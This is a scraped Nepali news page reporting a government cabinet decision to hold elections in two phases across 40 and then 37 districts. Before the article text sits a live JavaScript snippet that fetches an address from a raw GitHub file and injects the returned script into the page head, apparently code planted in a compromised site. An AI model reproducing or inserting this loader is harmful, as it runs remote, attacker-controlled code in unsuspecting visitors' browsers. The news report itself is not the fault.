;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दुई चरणमा चुनाव गर्ने मन्त्रिपरिषद्काे निर्णय – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • दुई चरणमा चुनाव गर्ने मन्त्रिपरिषद्काे निर्णय
देश/प्रदेश

दुई चरणमा चुनाव गर्ने मन्त्रिपरिषद्काे निर्णय

माघ २७,
काठमाण्डाै । सरकारले पहिलो चरणमा ४० जिल्लामा चुनाव गर्ने निर्णय गरेको छ । (हिजो) सोमबार बसेको मन्त्रिपरिषद्काे बैठकले पहिलो चरणमा वैशाख १७ गते ४० जिल्लामा र दोस्रो चरणमा २७ गते ३७ जिल्लामा चुनाव गर्ने निर्णय गरेको सरकारका प्रवक्ता एवम् सञ्चार तथा सूचना प्रविधि मन्त्री पार्वत गुरुङले जानकारी दिए ।

उनका अनुसार वैशाख १७ गते कर्णाली, लुम्बिनी र प्रदेश २ का ४० जिल्लामा चुनाव हुनेछ भने दोस्रो चरणमा सुदूरपश्चिम, वाग्मती र प्रदेश १ का ३७ जिल्लामा चुनाव गर्ने निर्णय भएको छ ।

गएको पुस ५ गते सरकारको सिफारिसमा राष्ट्रपति विद्यादेवी भण्डारीले प्रतिनिधिसभा भङ्ग गर्दै वैशाख १७ र २७ गते दुई चरणमा चुनाव गर्ने घोषणा गरेकी छन् ।

चुनावका विषयमा छलफल गर्न प्रधानमन्त्री केपी शर्मा ओली आज निर्वाचन आयोगमा जाँदै छन् ।

फेसबुक प्रतिक्रियाहरु